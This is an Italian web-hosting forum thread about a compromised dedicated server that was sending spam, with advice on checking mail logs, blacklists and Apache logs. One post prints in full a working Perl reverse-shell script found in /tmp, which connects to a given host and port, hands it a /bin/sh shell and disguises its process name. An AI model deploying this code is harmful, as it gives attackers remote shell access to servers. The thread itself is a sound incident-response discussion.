Problema email in uscita (server smtp)

[chipreka]

Salve,
oggi ho notato che la posta in uscita (di diversi domini ospitati sullo stesso server dedicato ovh, con installato plesk 8.4.0) non arriva al destinatario.

Ho provato con più di 20 destinatari, quindi credo sia proprio un problema a livello del server SMTP (e non dei server che ricevano la posta)

Qualcuno sa dirmi qual è il problema? E come faccio ad accorgermi quando un servizio è non funzionante?

Saluti,
Matteo

[bago]

Spedisci tramite i server OVH o direttamente dal tuo dedicato?

I 20 destinatari sono dello stesso dominio o domini differente? Non ottieni alcun errore?

[chipreka]

Premetto che la posta in uscita funzionava fino a qualche giorno fa, non ho fatto modifiche sul server ma ora non funziona più.
Non ottengo alcun messaggio di errore ma le email non arrivano ai destinatari (email di differenti domini).

L'errore lo fa sia se accedo a webmail.miodominio.ext sia se uso un client di posta (thunderbird) e come server smtp uso il nome del mio server dedicato (nsXXXXXX.ovh.net)

[bago]

Se usi il tuo dedicato allora le email saranno in coda all'interno del server. controlla lo spool e dai log del tuo mail server dovresti anche vedere perchè non spedisce più.

Se invii molte email probabilmente sei finito in qualche blacklist. Puoi controllare quelle pubbliche su http://www.mxtoolbox.com/blacklists.aspx e puoi controllare la reputazione del tuo IP (quello che usi in uscita, che in funzione di come hai configurato può essere il dedicato o il failover) come descritto in http://emailmarketingblog.it/blog/20...ra-reputazione

[chipreka]

Ciao bago,
grazie del suggerimento, ora ho risolto;

il problema si è verificato dato che uno spammer è entrato in qualche modo nel server, ha depositato nella cartella /tmp una lista di email e uno script in perl e configurato qmail per l'invio di email spam.
Ho provveduto quindi a cambiare la password di root e la password di plesk, ho cancellato lo spool delle email in uscita di qmail e riavviato il server smtp. Ora rifunziona tutto perfettamente.

Come posso scoprire quale vulnerabilità ha sfruttato lo spammer per entrare nel server?
Come posso prevenire future intrusioni? Posso essere avvisato tramite email di eventuali intrusioni?

Saluti,
Matteo Totaro

[bago]

Se è stata usata la /tmp allora non credo che chi ha violato il sistema abbia ottenuto accesso alla shell. Che diritti avevano i file della tmp? (apache.apache ?) La maggior parte delle vulnerabilità sono legate a programmi che hai installato nel web. Dai log del webserver potresti riuscire a capire chi invocava lo script e quali siano le prime cose che ha fatto.

Controlla anche le email che stava inviando... di solito una mail di spam è finalizzata a qualcosa e quindi contiene un indirizzo email o un indirizzo web: fai una denuncia contro ignoti usando questi dati.

[chipreka]

Ciao bago,
grazie ancora per i tuoi suggerimenti,

infatti i 3 file creati avevamo come diritti apache.apache
Nella cartella tmp oltre alla lista delle email e lo script di invio email (fatto in perl) ho trovato questo script in perl che credo cerchi di effettuare qualche connessione, scansione di porte, ecc...

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Inoltre esaminando i log di apache ho notato che avevo lo stesso problema descritto in questo thread: http://forum.ovh.it/showthread.php?t=317
e quindi ho creato lo script suggerito da torpado e l'ho messo, attraverso cron, in esecuzione ogni mezz'ora
Nelle prossime ore analizzerò se si verificherà ancora questo problema.

P.S.: ho letto l'email di spam e l'indirizzo mittente; l'email sembra in spagnolo/portoghese e l'email mittente è jucargo@mail.com
Mi conviene fare una denuncia alla polizia contro ignoti? Che vantaggi otterrei considerando che in Italia questi argomenti sono poco conosciuti dalle forze dell'ordine?

[ciberdany]

chipreka
anche io purtroppo ho avuto il tuo quasi stesso problema, ma il mio era peggio, script in perl ma crittato che ho dovuto decrittare uploadato nella cartella cgi di un utente, che ha spammato al mondo tonnellate di email in qualche giorno, e sono stato blacklistato, anche io cambiato password a destra e a manca, ma tutto inutile direi, tanto non entrano via ssh sfruttano bug dei siti o bucano l'ftp, secondo me grazie agli spyware installati sui computer degli utenti del server beccano user e pass ftp non trovo altra spiegazione.....anche dai log non c'è stata alcuna forzatura.
L'unica sicurezza alla fine è comprarsi un iphone collegato 24 ore su 24 in tasca con ssh aperto con la lista processi , io lo faccio da letto con l'ipod touch e la wireless....ma non è vita !

[bago]

Quote:

Originally Posted by ciberdany

L'unica sicurezza alla fine è comprarsi un iphone collegato 24 ore su 24 in tasca con ssh aperto con la lista processi

E un carrellino per le batterie di ricambio.